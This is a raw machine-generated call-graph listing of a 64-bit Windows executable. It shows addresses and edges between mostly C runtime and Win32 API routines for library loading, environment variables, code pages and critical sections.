7ff735c53d86 17744->17750 17747 7ff735c53e3c 17748 7ff735c53e11 17750->17718 17868 7ff735c5d448 17755->17868 17759 7ff735c53c26 17758->17759 17760 7ff735c53c02 17758->17760 17761 7ff735c53c2b 17759->17761 17762 7ff735c53c80 17759->17762 17763 7ff735c59468 __free_lconv_num 11 API calls 17760->17763 17765 7ff735c53c11 17760->17765 17761->17765 17766 7ff735c53c40 17761->17766 17768 7ff735c59468 __free_lconv_num 11 API calls 17761->17768 17878 7ff735c5de64 17762->17878 17763->17765 17765->17724 17765->17725 17769 7ff735c5c140 _fread_nolock 12 API calls 17766->17769 17768->17766 17769->17765 17781 7ff735c53fb3 17780->17781 17782 7ff735c53ef6 17780->17782 17784 7ff735c53fbb 17781->17784 17785 7ff735c53fdd 17781->17785 17783 7ff735c53f22 GetFileInformationByHandle 17782->17783 17787 7ff735c542c8 21 API calls 17782->17787 17788 7ff735c53f4b 17783->17788 17789 7ff735c53fce GetLastError 17783->17789 17784->17789 17790 7ff735c53fbf 17784->17790 17786 7ff735c54000 PeekNamedPipe 17785->17786 17805 7ff735c53f9e 17785->17805 17786->17805 17791 7ff735c53f10 17787->17791 17792 7ff735c5418c 51 API calls 17788->17792 17794 7ff735c53a8c _fread_nolock 11 API calls 17789->17794 17793 7ff735c53b18 _get_daylight 11 API calls 17790->17793 17791->17783 17791->17805 17796 7ff735c53f56 17792->17796 17793->17805 17794->17805 17795 7ff735c4a410 _wfindfirst32i64 8 API calls 17797 7ff735c53de0 17795->17797 17805->17795 17807 7ff735c54406 17806->17807 17808 7ff735c53b18 _get_daylight 11 API calls 17807->17808 17826 7ff735c5449e __std_exception_copy 17807->17826 17810 7ff735c54418 17808->17810 17809 7ff735c4a410 _wfindfirst32i64 8 API calls 17811 7ff735c53e0d 17809->17811 17812 7ff735c53b18 _get_daylight 11 API calls 17810->17812 17811->17747 17811->17748 17813 7ff735c54420 17812->17813 17826->17809 17869 7ff735c5d4a9 17868->17869 17876 7ff735c5d4a4 __vcrt_InitializeCriticalSectionEx 17868->17876 17869->17721 17870 7ff735c5d4d8 LoadLibraryW 17872 7ff735c5d5ad 17870->17872 17873 7ff735c5d4fd GetLastError 17870->17873 17871 7ff735c5d5cd GetProcAddress 17871->17869 17875 7ff735c5d5de 17871->17875 17872->17871 17874 7ff735c5d5c4 FreeLibrary 17872->17874 17873->17876 17874->17871 17875->17869 17876->17869 17876->17870 17876->17871 17877 7ff735c5d537 LoadLibraryExW 17876->17877 17877->17872 17877->17876 17879 7ff735c5de6c MultiByteToWideChar 17878->17879 17908 7ff735c569c4 17907->17908 17922 7ff735c56a76 memcpy_s 17907->17922 17909 7ff735c56a86 17908->17909 17910 7ff735c569db 17908->17910 17915 7ff735c59dd8 _get_daylight 11 API calls 17909->17915 17909->17922 17942 7ff735c5eda0 EnterCriticalSection 17910->17942 17911 7ff735c53b18 _get_daylight 11 API calls 17912 7ff735c46a70 17911->17912 17912->16011 17916 7ff735c56aa2 17915->17916 17916->17922 17922->17911 17922->17912 17972 7ff735c412f8 17971->17972 17973 7ff735c412c6 17971->17973 17975 7ff735c4ebd0 73 API calls 17972->17975 17974 7ff735c43b00 116 API calls 17973->17974 17976 7ff735c412d6 17974->17976 17977 7ff735c4130a 17975->17977 17976->17972 17978 7ff735c412de 17976->17978 17979 7ff735c4130e 17977->17979 17980 7ff735c4132f 17977->17980 17981 7ff735c42820 59 API calls 17978->17981 17982 7ff735c42580 59 API calls 17979->17982 17985 7ff735c41364 17980->17985 17986 7ff735c41344 17980->17986 17983 7ff735c412ee 17981->17983 17984 7ff735c41325 17982->17984 17983->16082 17984->16082 17988 7ff735c4137e 17985->17988 17993 7ff735c41395 17985->17993 17987 7ff735c42580 59 API calls 17986->17987 17994 7ff735c4135f __std_exception_copy 17987->17994 17989 7ff735c41050 98 API calls 17988->17989 17989->17994 17990 7ff735c41421 17990->16082 17991 7ff735c4e8b8 _fread_nolock 53 API calls 17991->17993 17992 7ff735c4e568 74 API calls 17992->17990 17993->17991 17993->17994 17995 7ff735c413de 17993->17995 17994->17990 17994->17992 17996 7ff735c42580 59 API calls 17995->17996 17996->17994 17998 7ff735c41be0 49 API calls 17997->17998 17999 7ff735c43bb0 17998->17999 17999->16084 18001 7ff735c416ab 18000->18001 18002 7ff735c41669 18000->18002 18001->16088 18002->18001 18003 7ff735c42820 59 API calls 18002->18003 18004 7ff735c416bf 18003->18004 18004->16088 18006 7ff735c47250 57 API calls 18005->18006 18007 7ff735c46c17 LoadLibraryExW 18006->18007 18008 7ff735c46c34 __std_exception_copy 18007->18008 18008->16109 18010 7ff735c44710 18009->18010 18011 7ff735c41be0 49 API calls 18010->18011 18012 7ff735c44742 18011->18012 18013 7ff735c4476b 18012->18013 18014 7ff735c4474b 18012->18014 18016 7ff735c447c2 18013->18016 18018 7ff735c43b80 49 API calls 18013->18018 18015 7ff735c42820 59 API calls 18014->18015 18036 7ff735c44761 18015->18036 18017 7ff735c43b80 49 API calls 18016->18017 18020 7ff735c447db 18017->18020 18019 7ff735c4478c 18018->18019 18021 7ff735c447aa 18019->18021 18024 7ff735c42820 59 API calls 18019->18024 18023 7ff735c447f9 18020->18023 18027 7ff735c42820 59 API calls 18020->18027 18086 7ff735c43a90 18021->18086 18022 7ff735c4a410 _wfindfirst32i64 8 API calls 18026 7ff735c42f3e 18022->18026 18028 7ff735c46c00 58 API calls 18023->18028 18024->18021 18026->16188 18037 7ff735c44a80 18026->18037 18027->18023 18029 7ff735c44806 18028->18029 18030 7ff735c4482d 18029->18030 18031 7ff735c4480b 18029->18031 18092 7ff735c43c40 GetProcAddress 18030->18092 18033 7ff735c426d0 57 API calls 18031->18033 18033->18036 18035 7ff735c46c00 58 API calls 18035->18016 18036->18022 18038 7ff735c47250 57 API calls 18037->18038 18039 7ff735c44aa2 18038->18039 18040 7ff735c44aa7 18039->18040 18041 7ff735c44abe 18039->18041 18042 7ff735c42820 59 API calls 18040->18042 18044 7ff735c47250 57 API calls 18041->18044 18043 7ff735c44ab3 18042->18043 18043->16190 18045 7ff735c44aec 18044->18045 18048 7ff735c41be0 49 API calls 18045->18048 18059 7ff735c44af1 __std_exception_copy 18045->18059 18046 7ff735c42820 59 API calls 18047 7ff735c44c67 18046->18047 18047->16190 18049 7ff735c44b67 18048->18049 18050 7ff735c44b6e 18049->18050 18051 7ff735c44b93 18049->18051 18053 7ff735c42820 59 API calls 18050->18053 18052 7ff735c47250 57 API calls 18051->18052 18055 7ff735c44bac 18052->18055 18054 7ff735c44b83 18053->18054 18054->16190 18055->18059 18194 7ff735c44860 18055->18194 18059->18046 18060 7ff735c44c50 18059->18060 18060->16190 18062 7ff735c444e7 18061->18062 18062->18062 18063 7ff735c44509 18062->18063 18070 7ff735c44520 __std_exception_copy 18062->18070 18064 7ff735c42820 59 API calls 18063->18064 18065 7ff735c44515 18064->18065 18065->16192 18066 7ff735c412b0 122 API calls 18066->18070 18067 7ff735c41770 59 API calls 18067->18070 18068 7ff735c445ed 18068->16192 18069 7ff735c42820 59 API calls 18069->18070 18070->18066 18070->18067 18070->18068 18070->18069 18087 7ff735c43a9a 18086->18087 18088 7ff735c47250 57 API calls 18087->18088 18089 7ff735c43ac2 18088->18089 18090 7ff735c4a410 _wfindfirst32i64 8 API calls 18089->18090 18091 7ff735c43aea 18090->18091 18091->18016 18091->18035 18093 7ff735c43c62 18092->18093 18094 7ff735c43c80 GetProcAddress 18092->18094 18096 7ff735c426d0 57 API calls 18093->18096 18094->18093 18095 7ff735c43ca5 GetProcAddress 18094->18095 18095->18093 18097 7ff735c43cca GetProcAddress 18095->18097 18098 7ff735c43c75 18096->18098 18097->18093 18099 7ff735c43cf2 GetProcAddress 18097->18099 18098->18036 18099->18093 18100 7ff735c43d1a GetProcAddress 18099->18100 18100->18093 18101 7ff735c43d42 GetProcAddress 18100->18101 18101->18093 18102 7ff735c43d6a GetProcAddress 18101->18102 18103 7ff735c43d92 GetProcAddress 18102->18103 18104 7ff735c43d86 18102->18104 18105 7ff735c43dba GetProcAddress 18103->18105 18106 7ff735c43dae 18103->18106 18104->18103 18106->18105 18198 7ff735c4487a 18194->18198 18454 7ff735c48e80 18455 7ff735c48eae 18454->18455 18456 7ff735c48e95 18454->18456 18456->18455 18458 7ff735c5c140 12 API calls 18456->18458 18457 7ff735c48f08 18458->18457 18931 7ff735c48a9c 18933 7ff735c47eff 18931->18933 18934 7ff735c47f83 18931->18934 18932 7ff735c49120 12 API calls 18932->18934 18933->18932 18933->18934 18935 7ff735c6899e 18938 7ff735c539cc LeaveCriticalSection 18935->18938 18939 7ff735c48098 18940 7ff735c4809d 18939->18940 18946 7ff735c481fc 18940->18946 18948 7ff735c47d54 18940->18948 18949 7ff735c49860 18940->18949 18941 7ff735c49120 12 API calls 18945 7ff735c47f83 18941->18945 18943 7ff735c49860 12 API calls 18944 7ff735c484f5 18943->18944 18947 7ff735c49860 12 API calls 18944->18947 18944->18948 18946->18943 18946->18948 18947->18948 18948->18941 18948->18945 18955 7ff735c498c0 18949->18955 18950 7ff735c4a7a4 8 API calls 18951 7ff735c49e10 18950->18951 18952 7ff735c4998f 18953 7ff735c4a410 _wfindfirst32i64 8 API calls 18952->18953 18954 7ff735c49b68 18953->18954 18954->18946 18955->18952 18956 7ff735c49dcc 18955->18956 18956->18950 18957 7ff735c5ef98 18958 7ff735c5efbc 18957->18958 18962 7ff735c5efcc 18957->18962 18959 7ff735c53b18 _get_daylight 11 API calls 18958->18959 18960 7ff735c5efc1 18959->18960 18961 7ff735c5f2ac 18964 7ff735c53b18 _get_daylight 11 API calls 18961->18964 18962->18961 18963 7ff735c5efee 18962->18963 18965 7ff735c5f00f 18963->18965 19088 7ff735c5f654 18963->19088 18966 7ff735c5f2b1 18964->18966 18969 7ff735c5f081 18965->18969 18971 7ff735c5f035 18965->18971 18979 7ff735c5f075 18965->18979 18968 7ff735c59468 __free_lconv_num 11 API calls 18966->18968 18968->18960 18973 7ff735c5d3d0 _get_daylight 11 API calls 18969->18973 18986 7ff735c5f044 18969->18986 18970 7ff735c5f12e 18978 7ff735c5f14b 18970->18978 18987 7ff735c5f19d 18970->18987 19103 7ff735c57b18 18971->19103 18976 7ff735c5f097 18973->18976 18975 7ff735c59468 __free_lconv_num 11 API calls 18975->18960 18980 7ff735c59468 __free_lconv_num 11 API calls 18976->18980 18983 7ff735c59468 __free_lconv_num 11 API calls 18978->18983 18979->18970 18979->18986 19109 7ff735c65664 18979->19109 18984 7ff735c5f0a5 18980->18984 18981 7ff735c5f05d 18981->18979 18989 7ff735c5f654 45 API calls 18981->18989 18982 7ff735c5f03f 18985 7ff735c53b18 _get_daylight 11 API calls 18982->18985 18988 7ff735c5f154 18983->18988 18984->18979 18984->18986 18992 7ff735c5d3d0 _get_daylight 11 API calls 18984->18992 18985->18986 18986->18975 18987->18986 18990 7ff735c61a54 40 API calls 18987->18990 18991 7ff735c5f159 18988->18991 19145 7ff735c61a54 18988->19145 18989->18979 18993 7ff735c5f1da 18990->18993 18999 7ff735c5f2a0 18991->18999 19003 7ff735c5d3d0 _get_daylight 11 API calls 18991->19003 18994 7ff735c5f0c7 18992->18994 18995 7ff735c59468 __free_lconv_num 11 API calls 18993->18995 18997 7ff735c59468 __free_lconv_num 11 API calls 18994->18997 18998 7ff735c5f1e4 18995->18998 18997->18979 18998->18986 18998->18991 19001 7ff735c59468 __free_lconv_num 11 API calls 18999->19001 19000 7ff735c5f185 19002 7ff735c59468 __free_lconv_num 11 API calls 19000->19002 19001->18960 19002->18991 19004 7ff735c5f228 19003->19004 19005 7ff735c5f239 19004->19005 19006 7ff735c5f230 19004->19006 19008 7ff735c5880c __std_exception_copy 37 API calls 19005->19008 19007 7ff735c59468 __free_lconv_num 11 API calls 19006->19007 19009 7ff735c5f237 19007->19009 19010 7ff735c5f248 19008->19010 19015 7ff735c59468 __free_lconv_num 11 API calls 19009->19015 19011 7ff735c5f2db 19010->19011 19012 7ff735c5f250 19010->19012 19014 7ff735c59420 _wfindfirst32i64 17 API calls 19011->19014 19154 7ff735c6577c 19012->19154 19017 7ff735c5f2ef 19014->19017 19015->18960 19020 7ff735c5f318 19017->19020 19026 7ff735c5f328 19017->19026 19018 7ff735c5f298 19022 7ff735c59468 __free_lconv_num 11 API calls 19018->19022 19019 7ff735c5f277 19023 7ff735c53b18 _get_daylight 11 API calls 19019->19023 19021 7ff735c53b18 _get_daylight 11 API calls 19020->19021 19049 7ff735c5f31d 19021->19049 19022->18999 19024 7ff735c5f27c 19023->19024 19027 7ff735c59468 __free_lconv_num 11 API calls 19024->19027 19025 7ff735c5f60a 19029 7ff735c53b18 _get_daylight 11 API calls 19025->19029 19026->19025 19028 7ff735c5f34a 19026->19028 19027->19009 19030 7ff735c5f367 19028->19030 19173 7ff735c5f73c 19028->19173 19031 7ff735c5f60f 19029->19031 19034 7ff735c5f3db 19030->19034 19036 7ff735c5f38f 19030->19036 19042 7ff735c5f3cf 19030->19042 19033 7ff735c59468 __free_lconv_num 11 API calls 19031->19033 19033->19049 19038 7ff735c5f403 19034->19038 19043 7ff735c5d3d0 _get_daylight 11 API calls 19034->19043 19055 7ff735c5f39e 19034->19055 19035 7ff735c5f48e 19047 7ff735c5f4ab 19035->19047 19056 7ff735c5f4fe 19035->19056 19188 7ff735c57b54 19036->19188 19040 7ff735c5d3d0 _get_daylight 11 API calls 19038->19040 19038->19042 19038->19055 19048 7ff735c5f425 19040->19048 19041 7ff735c59468 __free_lconv_num 11 API calls 19041->19049 19042->19035 19042->19055 19194 7ff735c65524 19042->19194 19050 7ff735c5f3f5 19043->19050 19045 7ff735c5f3b7 19045->19042 19058 7ff735c5f73c 45 API calls 19045->19058 19046 7ff735c5f399 19052 7ff735c53b18 _get_daylight 11 API calls 19046->19052 19053 7ff735c59468 __free_lconv_num 11 API calls 19047->19053 19054 7ff735c59468 __free_lconv_num 11 API calls 19048->19054 19051 7ff735c59468 __free_lconv_num 11 API calls 19050->19051 19051->19038 19052->19055 19057 7ff735c5f4b4 19053->19057 19054->19042 19055->19041 19056->19055 19059 7ff735c61a54 40 API calls 19056->19059 19062 7ff735c61a54 40 API calls 19057->19062 19065 7ff735c5f4ba 19057->19065 19058->19042 19060 7ff735c5f53c 19059->19060 19061 7ff735c59468 __free_lconv_num 11 API calls 19060->19061 19063 7ff735c5f546 19061->19063 19066 7ff735c5f4e6 19062->19066 19063->19055 19063->19065 19064 7ff735c5f5fe 19067 7ff735c59468 __free_lconv_num 11 API calls 19064->19067 19065->19064 19069 7ff735c5d3d0 _get_daylight 11 API calls 19065->19069 19068 7ff735c59468 __free_lconv_num 11 API calls 19066->19068 19067->19049 19068->19065 19070 7ff735c5f58b 19069->19070 19071 7ff735c5f59c 19070->19071 19072 7ff735c5f593 19070->19072 19074 7ff735c5ef30 _wfindfirst32i64 37 API calls 19071->19074 19073 7ff735c59468 __free_lconv_num 11 API calls 19072->19073 19075 7ff735c5f59a 19073->19075 19076 7ff735c5f5aa 19074->19076 19082 7ff735c59468 __free_lconv_num 11 API calls 19075->19082 19077 7ff735c5f63e 19076->19077 19078 7ff735c5f5b2 SetEnvironmentVariableW 19076->19078 19081 7ff735c59420 _wfindfirst32i64 17 API calls 19077->19081 19079 7ff735c5f5f6 19078->19079 19080 7ff735c5f5d5 19078->19080 19083 7ff735c59468 __free_lconv_num 11 API calls 19079->19083 19084 7ff735c53b18 _get_daylight 11 API calls 19080->19084 19085 7ff735c5f652 19081->19085 19082->19049 19083->19064 19086 7ff735c5f5da 19084->19086 19087 7ff735c59468 __free_lconv_num 11 API calls 19086->19087 19087->19075 19089 7ff735c5f689 19088->19089 19090 7ff735c5f671 19088->19090 19091 7ff735c5d3d0 _get_daylight 11 API calls 19089->19091 19090->18965 19097 7ff735c5f6ad 19091->19097 19092 7ff735c5886c __CxxCallCatchBlock 45 API calls 19094 7ff735c5f738 19092->19094 19093 7ff735c5f70e 19095 7ff735c59468 __free_lconv_num 11 API calls 19093->19095 19095->19090 19096 7ff735c5d3d0 _get_daylight 11 API calls 19096->19097 19097->19093 19097->19096 19098 7ff735c59468 __free_lconv_num 11 API calls 19097->19098 19099 7ff735c5880c __std_exception_copy 37 API calls 19097->19099 19100 7ff735c5f71d 19097->19100 19102 7ff735c5f732 19097->19102 19098->19097 19099->19097 19101 7ff735c59420 _wfindfirst32i64 17 API calls 19100->19101 19101->19102 19102->19092 19104 7ff735c57b31 19103->19104 19105 7ff735c57b28 19103->19105 19104->18981 19104->18982 19105->19104 19218 7ff735c575f0 19105->19218 19110 7ff735c64818 19109->19110 19111 7ff735c65671 19109->19111 19112 7ff735c64825 19110->19112 19118 7ff735c6485b 19110->19118 19113 7ff735c540f0 45 API calls 19111->19113 19115 7ff735c53b18 _get_daylight 11 API calls 19112->19115 19131 7ff735c647cc 19112->19131 19114 7ff735c656a5 19113->19114 19119 7ff735c656aa 19114->19119 19123 7ff735c656bb 19114->19123 19126 7ff735c656d2 19114->19126 19120 7ff735c6482f 19115->19120 19116 7ff735c64885 19117 7ff735c53b18 _get_daylight 11 API calls 19116->19117 19121 7ff735c6488a 19117->19121 19118->19116 19122 7ff735c648aa 19118->19122 19119->18979 19124 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19120->19124 19125 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19121->19125 19132 7ff735c540f0 45 API calls 19122->19132 19137 7ff735c64895 19122->19137 19127 7ff735c53b18 _get_daylight 11 API calls 19123->19127 19128 7ff735c6483a 19124->19128 19125->19137 19129 7ff735c656dc 19126->19129 19130 7ff735c656ee 19126->19130 19133 7ff735c656c0 19127->19133 19128->18979 19134 7ff735c53b18 _get_daylight 11 API calls 19129->19134 19135 7ff735c65716 19130->19135 19136 7ff735c656ff 19130->19136 19131->18979 19132->19137 19138 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19133->19138 19139 7ff735c656e1 19134->19139 19456 7ff735c67598 19135->19456 19447 7ff735c64868 19136->19447 19137->18979 19138->19119 19142 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19139->19142 19142->19119 19144 7ff735c53b18 _get_daylight 11 API calls 19144->19119 19146 7ff735c61a93 19145->19146 19147 7ff735c61a76 19145->19147 19149 7ff735c61a9d 19146->19149 19496 7ff735c66150 19146->19496 19147->19146 19148 7ff735c61a84 19147->19148 19150 7ff735c53b18 _get_daylight 11 API calls 19148->19150 19503 7ff735c6618c 19149->19503 19153 7ff735c61a89 __scrt_get_show_window_mode 19150->19153 19153->19000 19155 7ff735c540f0 45 API calls 19154->19155 19156 7ff735c657e2 19155->19156 19157 7ff735c657f0 19156->19157 19158 7ff735c5d660 5 API calls 19156->19158 19159 7ff735c53bd8 14 API calls 19157->19159 19158->19157 19160 7ff735c6584c 19159->19160 19161 7ff735c658dc 19160->19161 19162 7ff735c540f0 45 API calls 19160->19162 19164 7ff735c658ed 19161->19164 19165 7ff735c59468 __free_lconv_num 11 API calls 19161->19165 19163 7ff735c6585f 19162->19163 19167 7ff735c5d660 5 API calls 19163->19167 19170 7ff735c65868 19163->19170 19166 7ff735c5f273 19164->19166 19168 7ff735c59468 __free_lconv_num 11 API calls 19164->19168 19165->19164 19166->19018 19166->19019 19167->19170 19168->19166 19169 7ff735c53bd8 14 API calls 19171 7ff735c658c3 19169->19171 19170->19169 19171->19161 19172 7ff735c658cb SetEnvironmentVariableW 19171->19172 19172->19161 19174 7ff735c5f77c 19173->19174 19175 7ff735c5f75f 19173->19175 19176 7ff735c5d3d0 _get_daylight 11 API calls 19174->19176 19175->19030 19183 7ff735c5f7a0 19176->19183 19177 7ff735c5f824 19179 7ff735c5886c __CxxCallCatchBlock 45 API calls 19177->19179 19178 7ff735c5f801 19180 7ff735c59468 __free_lconv_num 11 API calls 19178->19180 19181 7ff735c5f82a 19179->19181 19180->19175 19182 7ff735c5d3d0 _get_daylight 11 API calls 19182->19183 19183->19177 19183->19178 19183->19182 19184 7ff735c59468 __free_lconv_num 11 API calls 19183->19184 19185 7ff735c5ef30 _wfindfirst32i64 37 API calls 19183->19185 19186 7ff735c5f810 19183->19186 19184->19183 19185->19183 19187 7ff735c59420 _wfindfirst32i64 17 API calls 19186->19187 19187->19177 19189 7ff735c57b6d 19188->19189 19190 7ff735c57b64 19188->19190 19189->19045 19189->19046 19190->19189 19191 7ff735c57664 40 API calls 19190->19191 19192 7ff735c57b76 19191->19192 19192->19189 19193 7ff735c57a24 12 API calls 19192->19193 19193->19189 19195 7ff735c65531 19194->19195 19198 7ff735c6555e 19194->19198 19196 7ff735c65536 19195->19196 19195->19198 19197 7ff735c53b18 _get_daylight 11 API calls 19196->19197 19200 7ff735c6553b 19197->19200 19199 7ff735c655a2 19198->19199 19202 7ff735c655c1 19198->19202 19213 7ff735c65596 __crtLCMapStringW 19198->19213 19201 7ff735c53b18 _get_daylight 11 API calls 19199->19201 19203 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19200->19203 19204 7ff735c655a7 19201->19204 19205 7ff735c655cb 19202->19205 19206 7ff735c655dd 19202->19206 19207 7ff735c65546 19203->19207 19209 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19204->19209 19210 7ff735c53b18 _get_daylight 11 API calls 19205->19210 19208 7ff735c540f0 45 API calls 19206->19208 19207->19042 19211 7ff735c655ea 19208->19211 19209->19213 19212 7ff735c655d0 19210->19212 19211->19213 19515 7ff735c67158 19211->19515 19214 7ff735c59400 _invalid_parameter_noinfo 37 API calls 19212->19214 19213->19042 19214->19213 19217 7ff735c53b18 _get_daylight 11 API calls 19217->19213 19219 7ff735c57609 19218->19219 19228 7ff735c57605 19218->19228 19241 7ff735c60ca4 19219->19241 19224 7ff735c5761b 19226 7ff735c59468 __free_lconv_num 11 API calls 19224->19226 19225 7ff735c57627 19267 7ff735c576d4 19225->19267 19226->19228 19228->19104 19233 7ff735c57944 19228->19233 19230 7ff735c59468 __free_lconv_num 11 API calls 19231 7ff735c5764e 19230->19231 19232 7ff735c59468 __free_lconv_num 11 API calls 19231->19232 19232->19228 19234 7ff735c5796d 19233->19234 19239 7ff735c57986 19233->19239 19234->19104 19235 7ff735c5d3d0 _get_daylight 11 API calls 19235->19239 19236 7ff735c57a16 19238 7ff735c59468 __free_lconv_num 11 API calls 19236->19238 19237 7ff735c5e704 WideCharToMultiByte 19237->19239 19238->19234 19239->19234 19239->19235 19239->19236 19239->19237 19240 7ff735c59468 __free_lconv_num 11 API calls 19239->19240 19240->19239 19242 7ff735c5760e 19241->19242 19243 7ff735c60cb1 19241->19243 19247 7ff735c60fe0 GetEnvironmentStringsW 19242->19247 19286 7ff735c59d34 19243->19286 19248 7ff735c57613 19247->19248 19249 7ff735c61010 19247->19249 19248->19224 19248->19225 19250 7ff735c5e704 WideCharToMultiByte 19249->19250 19251 7ff735c61061 19250->19251 19252 7ff735c61068 FreeEnvironmentStringsW 19251->19252 19253 7ff735c5c140 _fread_nolock 12 API calls 19251->19253 19252->19248 19254 7ff735c6107b 19253->19254 19255 7ff735c6108c 19254->19255 19256 7ff735c61083 19254->19256 19257 7ff735c5e704 WideCharToMultiByte 19255->19257 19258 7ff735c59468 __free_lconv_num 11 API calls 19256->19258 19259 7ff735c610af 19257->19259 19260 7ff735c6108a 19258->19260 19261 7ff735c610bd 19259->19261 19262 7ff735c610b3 19259->19262 19260->19252 19264 7ff735c59468 __free_lconv_num 11 API calls 19261->19264 19263 7ff735c59468 __free_lconv_num 11 API calls 19262->19263 19265 7ff735c610bb FreeEnvironmentStringsW 19263->19265 19264->19265 19265->19248 19268 7ff735c576f9 19267->19268 19269 7ff735c5d3d0 _get_daylight 11 API calls 19268->19269 19281 7ff735c5772f 19269->19281 19270 7ff735c57737 19271 7ff735c59468 __free_lconv_num 11 API calls 19270->19271 19272 7ff735c5762f 19271->19272 19272->19230 19273 7ff735c577aa 19274 7ff735c59468 __free_lconv_num 11 API calls 19273->19274 19274->19272 19275 7ff735c5d3d0 _get_daylight 11 API calls 19275->19281 19276 7ff735c57799 19277 7ff735c57900 11 API calls 19276->19277 19279 7ff735c577a1 19277->19279 19278 7ff735c5880c __std_exception_copy 37 API calls 19278->19281 19280 7ff735c59468 __free_lconv_num 11 API calls 19279->19280 19280->19270 19281->19270 19281->19273 19281->19275 19281->19276 19281->19278 19282 7ff735c577cf 19281->19282 19284 7ff735c59468 __free_lconv_num 11 API calls 19281->19284 19283 7ff735c59420 _wfindfirst32i64 17 API calls 19282->19283 19285 7ff735c577e2 19283->19285 19284->19281 19287 7ff735c59d45 FlsGetValue 19286->19287 19288 7ff735c59d60 FlsSetValue 19286->19288 19289 7ff735c59d5a 19287->19289 19290 7ff735c59d52 19287->19290 19288->19290 19291 7ff735c59d6d 19288->19291 19289->19288 19292 7ff735c59d58 19290->19292 19293 7ff735c5886c __CxxCallCatchBlock 45 API calls 19290->19293 19294 7ff735c5d3d0 _get_daylight 11 API calls 19291->19294 19306 7ff735c6097c 19292->19306 19295 7ff735c59dd5 19293->19295 19296 7ff735c59d7c 19294->19296 19297 7ff735c59d9a FlsSetValue 19296->19297 19298 7ff735c59d8a FlsSetValue 19296->19298 19299 7ff735c59db8 19297->19299 19300 7ff735c59da6 FlsSetValue 19297->19300 19301 7ff735c59d93 19298->19301 19302 7ff735c59a10 _get_daylight 11 API calls 19299->19302 19300->19301 19303 7ff735c59468 __free_lconv_num 11 API calls 19301->19303 19304 7ff735c59dc0 19302->19304 19303->19290 19305 7ff735c59468 __free_lconv_num 11 API calls 19304->19305 19305->19292 19329 7ff735c60bec 19306->19329 19308 7ff735c609b1 19344 7ff735c6067c 19308->19344 19311 7ff735c5c140 _fread_nolock 12 API calls 19312 7ff735c609df 19311->19312 19313 7ff735c609e7 19312->19313 19316 7ff735c609f6 19312->19316 19314 7ff735c59468 __free_lconv_num 11 API calls 19313->19314 19315 7ff735c609ce 19314->19315 19315->19242 19316->19316 19351 7ff735c60d20 19316->19351 19319 7ff735c60af2 19320 7ff735c53b18 _get_daylight 11 API calls 19319->19320 19322 7ff735c60af7 19320->19322 19321 7ff735c60b4d 19324 7ff735c60bb4 19321->19324 19362 7ff735c604ac 19321->19362 19325 7ff735c59468 __free_lconv_num 11 API calls 19322->19325 19323 7ff735c60b0c 19323->19321 19326 7ff735c59468 __free_lconv_num 11 API calls 19323->19326 19328 7ff735c59468 __free_lconv_num 11 API calls 19324->19328 19325->19315 19326->19321 19328->19315 19330 7ff735c60c0f 19329->19330 19331 7ff735c60c19 19330->19331 19377 7ff735c5eda0 EnterCriticalSection 19330->19377 19333 7ff735c60c8b 19331->19333 19336 7ff735c5886c __CxxCallCatchBlock 45 API calls 19331->19336 19333->19308 19338 7ff735c60ca3 19336->19338 19339 7ff735c60cf6 19338->19339 19341 7ff735c59d34 50 API calls 19338->19341 19339->19308 19342 7ff735c60ce0 19341->19342 19343 7ff735c6097c 65 API calls 19342->19343 19343->19339 19345 7ff735c540f0 45 API calls 19344->19345 19346 7ff735c60690 19345->19346 19347 7ff735c6069c GetOEMCP 19346->19347 19348 7ff735c606ae 19346->19348 19350 7ff735c606c3 19347->19350 19349 7ff735c606b3 GetACP 19348->19349 19348->19350 19349->19350 19350->19311 19350->19315 19352 7ff735c6067c 47 API calls 19351->19352 19353 7ff735c60d4d 19352->19353 19355 7ff735c60d8a IsValidCodePage 19353->19355 19359 7ff735c60dcd __scrt_get_show_window_mode 19353->19359 19354 7ff735c4a410 _wfindfirst32i64 8 API calls 19356 7ff735c60ae9 19354->19356 19357 7ff735c60d9b 19355->19357 19355->19359 19356->19319 19356->19323 19358 7ff735c60dd2 GetCPInfo 19357->19358 19361 7ff735c60da4 __scrt_get_show_window_mode 19357->19361 19358->19359 19358->19361 19359->19354 19378 7ff735c60794 19361->19378 19446 7ff735c5eda0 EnterCriticalSection 19362->19446 19379 7ff735c607d1 GetCPInfo 19378->19379 19388 7ff735c608c7 19378->19388 19384 7ff735c607e4 19379->19384 19379->19388 19380 7ff735c4a410 _wfindfirst32i64 8 API calls 19382 7ff735c60966 19380->19382 19382->19359 19389 7ff735c614ac 19384->19389 19387 7ff735c660a0 54 API calls 19387->19388 19388->19380 19390 7ff735c540f0 45 API calls 19389->19390 19391 7ff735c614ee 19390->19391 19392 7ff735c5de64 _fread_nolock MultiByteToWideChar 19391->19392 19394 7ff735c61524 19392->19394 19393 7ff735c6152b 19396 7ff735c4a410 _wfindfirst32i64 8 API calls 19393->19396 19394->19393 19395 7ff735c5c140 _fread_nolock 12 API calls 19394->19395 19397 7ff735c615f2 19394->19397 19400 7ff735c61554 __scrt_get_show_window_mode 19394->19400 19395->19400 19398 7ff735c6085b 19396->19398 19397->19393 19399 7ff735c59468 __free_lconv_num 11 API calls 19397->19399 19404 7ff735c660a0 19398->19404 19399->19393 19400->19397 19401 7ff735c5de64 _fread_nolock MultiByteToWideChar 19400->19401 19402 7ff735c615cd 19401->19402 19402->19397 19403 7ff735c615d8 GetStringTypeW 19402->19403 19403->19397 19405 7ff735c540f0 45 API calls 19404->19405 19406 7ff735c660c5 19405->19406 19409 7ff735c65d80 19406->19409 19410 7ff735c65dc2 19409->19410 19411 7ff735c5de64 _fread_nolock MultiByteToWideChar 19410->19411 19414 7ff735c65e0c 19411->19414 19412 7ff735c66077 19413 7ff735c4a410 _wfindfirst32i64 8 API calls 19412->19413 19415 7ff735c6088e 19413->19415 19414->19412 19416 7ff735c5c140 _fread_nolock 12 API calls 19414->19416 19417 7ff735c65f44 19414->19417 19419 7ff735c65e42 19414->19419 19415->19387 19416->19419 19417->19412 19418 7ff735c59468 __free_lconv_num 11 API calls 19417->19418 19418->19412 19419->19417 19420 7ff735c5de64 _fread_nolock MultiByteToWideChar 19419->19420 19421 7ff735c65eb2 19420->19421 19421->19417 19437 7ff735c5d820 19421->19437 